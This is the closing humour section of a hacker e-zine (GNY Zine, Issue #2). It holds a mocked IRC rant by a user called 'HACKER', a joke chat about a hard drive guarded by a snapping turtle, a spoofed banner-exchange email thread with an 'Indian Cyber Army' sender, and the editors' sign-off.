<HACKER> I AM A HACKER/PHREAKER/CRACKER
<HACKER> YOU KNOW IT DOES NOT MATTER IF I LEAVE MY TRACE ON THE LOGINS
<HACKER> SOON IT WILL MATTER
<HACKER> DEFCON NEEDS TO SEE LOS ANGELES TALKEE
<HACKER> BEAVE IS A PHREAKER?
<HACKER> A HACKER TYPE?
<HACKER> BEAVE KNOWS MY IP
<HACKER> BEAVE
<HACKER> CONTACT ME
<HACKER> THROUGH SSH
<HACKER> COME HERE BEAVE
<HACKER> BEAVE IS NO HACKER
<HACKER> REMEMBER THAT
<HACKER> BEAVE AND LADYNIKON ARE JUST NEW
<HACKER> LADY NIKON IS NO HACKER
<HACKER> BEAVE IS NO HACKER
* HACKER (~HACKER@99.56.199.228) Quit (Quit: Leaving)
(By the way, does anyone know who this fellow is? He also goes by the name looptroop and has been
regularly talking to himself in #telephony and #phreak on 2600net about nonsensical conspiracy
theories for almost a year now. Dude has some persistence. @_@)
Better than disk encryption!
----------------------------------------------------------------------------------------------------
<OrderZero> open up the case OUT OF NOWHERE FUCKING DEADLY SPIDERS
<OrderZero> and a snapper turtle
<OrderZero> just for fun
<Snoopy> did you recover the harddrive .... no sir it was guarded by a 175 lb snapping turtle
<Snoopy> lets let this one go
<OrderZero> his name was alph
<OrderZero> and while his name sounded whimsical and friendly I disagreed with his views on politics
Wait, what?
----------------------------------------------------------------------------------------------------
Date: Sat, 11 Sep 2010 07:01:30 +0530
Subject: Banner Exchange
From: Indian Cyber Army <evil.hackerz.999@gmail.com>
To: hixmostorm@hotmail.com
Hi,i m the owner of Indian Cyber Army (ICA) @ http://cyberarmy.in
I see ur site . Its really nice,We are now allowing and inviting webmasters to do Banner Exchange.
That will make Profit for both both of us. Indian cyber army is totaly a Cyber security Community.
Hope you know already about it.So,I need members of cyber feild,and u need traffic and backlink.
Waiting for you positive reply...
Owner,ICA.
-=-=-
Date: Sat, 11 Sep 2010 22:11:08 -0400
Subject: RE: Banner Exchange
From: storm gny <hixmostorm@hotmail.com>
To: <evil.hackerz.999@gmail.com>
Hi ICA,
Thank you for considering us for a link exchange. I've passed on your request to the members of the
GNY review board, and we'll get back to you within the week. It usually takes only a few days, but
we're busy arranging the funeral for m0nkee since he got hit by a bus on Thursday. Wrong place,
wrong time I guess. Anyways, talk to you soon.
Regards,
John Travolta
-=-=-
Date: Sun, 12 Sep 2010 08:25:29 +0530
Subject: Re: Banner Exchange
From: Indian Cyber Army <evil.hackerz.999@gmail.com>
To: storm gny <hixmostorm@hotmail.com>
OKay,me also will add a new page on my site for banner exchage,there ur logo will be added,after i
getting ur response that u add my banner on ur site.
Thankyou.
Admin,ICA.
...>_>
Anyways, it looks like you've reached the end of GNY Zine, Issue #2. The next issue is already in
progress, so (if everything goes according to plan), we'll see you again in January. Our contact
information is in the introduction, and we'll try our best to respond to your messages within a
reasonable time. If you have content for future issues, send it in!
As always, may your hax be plentiful and full of fish.
Oh, and red boxing isn't dead.
<3, the gny crew
[==================================================================================================]